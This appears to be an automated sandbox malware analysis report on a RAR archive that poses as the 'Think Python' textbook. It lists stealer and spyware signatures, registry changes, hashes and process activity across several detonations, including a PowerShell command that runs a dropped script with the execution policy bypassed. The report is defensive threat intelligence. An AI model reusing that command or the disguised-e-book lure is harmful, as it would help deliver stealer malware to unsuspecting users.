Malware Analysis Report

2025-01-18 22:30

Sample ID 240612-gn6nzasejn
Target A-Think Python How to Think Like a Computer Scientist, 3rd Edition).rar
SHA256 68a7a77e1e9a004bc9e823d16c808a3129b17d3600a6fc13f0d34f94f4b0c22a
Tags
execution spyware stealer pdf
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

68a7a77e1e9a004bc9e823d16c808a3129b17d3600a6fc13f0d34f94f4b0c22a

Threat Level: Likely malicious

The file A-Think Python How to Think Like a Computer Scientist, 3rd Edition).rar was found to be: Likely malicious.

Malicious Activity Summary

execution spyware stealer pdf

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Deletes itself

Reads user/profile data of web browsers

Malformed data in PDF

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Modifies Internet Explorer settings

Views/modifies file attributes

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 05:58

Signatures

Malformed data in PDF

pdf

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240611-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Network

N/A

Files

memory/1912-0-0x0000000004D00000-0x0000000004D02000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240221-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Network

N/A

Files

memory/3000-0-0x0000000004C80000-0x0000000004C82000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240611-en

Max time kernel

122s

Max time network

127s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Network

N/A

Files

memory/1808-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

memory/1808-5-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/1808-6-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/1808-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240508-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 4e79896faedfd362e202522336b03a6b
SHA1 df0bc404811b84c8aa73187eeaa40e48ffaedb2a
SHA256 ff5d2f0ab632dd448a389cd2b693b9b573ad371362d7cd014e184b8e76429f61
SHA512 9824ef39be8434acf749621983d873ea57de0deeae5caec0d0e03b91525502082988b5282c4bf7a71a1b5216f8fb0782fb59efe9ef76ecc0551a2be7de0b52be

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240611-en

Max time kernel

93s

Max time network

125s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1744 wrote to memory of 1200 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1744 wrote to memory of 1200 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1744 wrote to memory of 1200 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
